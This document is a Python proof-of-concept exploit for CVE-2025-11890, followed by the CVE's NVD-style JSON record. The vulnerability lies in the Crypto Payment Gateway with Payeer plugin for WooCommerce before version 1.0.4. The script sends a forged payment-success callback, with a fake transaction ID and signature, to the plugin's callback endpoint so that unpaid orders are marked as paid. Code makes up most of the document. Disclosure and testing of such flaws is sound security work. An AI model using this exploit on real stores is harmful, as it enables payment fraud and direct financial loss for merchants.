CVE-2025-11890

import requests import json # CVE-2025-11890 PoC - Payment Bypass via Callback Endpoint # Target: WordPress site with Crypto Payment Gateway with Payeer for WooCommerce < 1.0.4 TARGET_URL = "https://vulnerable-site.com" ORDER_ID = "12345" # Replace with actual order ID CALLBACK_ENDPOINT = "/wc-api/bp-payeer-gateway-callback" def exploit_payment_bypass(): """ Exploit payment bypass vulnerability by sending fake callback to update order status. This PoC demonstrates how attackers can mark unpaid orders as paid. """ url = f"{TARGET_URL}{CALLBACK_ENDPOINT}" # Malicious callback payload - forging payment success response # Plugin does not properly validate this with Payeer server-side payload = { "order_id": ORDER_ID, "status": "success", "amount": "99.99", "currency": "USD", "transaction_id": "FAKE_TXN_" + str(ORDER_ID), "payment_date": "2025-01-01 00:00:00", "payer_account": "P123456789", "signature": "forged_signature_here" } headers = { "Content-Type": "application/json", "User-Agent": "Payeer Gateway Callback/1.0" } try: print(f"[*] Sending malicious callback to {url}") print(f"[*] Target Order ID: {ORDER_ID}") response = requests.post(url, json=payload, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text}") if response.status_code == 200: print("[+] Payment bypass exploit sent successfully!") print("[+] Order status may have been updated to 'paid' without actual payment") else: print("[-] Exploit may have failed") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-11890 - Payment Bypass PoC") print("Crypto Payment Gateway with Payeer for WooCommerce < 1.0.4") print("=" * 60) exploit_payment_bypass()

{"cve": {"id": "CVE-2025-11890", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:04.337", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Crypto Payment Gateway with Payeer for WooCommerce plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 1.0.3. This is due to the plugin not properly verifying a payments status through server-side validation though the /wc-api/bp-payeer-gateway-callback endpoint. This makes it possible for unauthenticated attackers to update unpaid order statuses to paid resulting in a loss of revenue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/crypto-payment-gateway-with-payeer-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43ca1393-637d-48e2-84f3-a06a4f0d83d1?source=cve", "source": "[email protected]"}]}}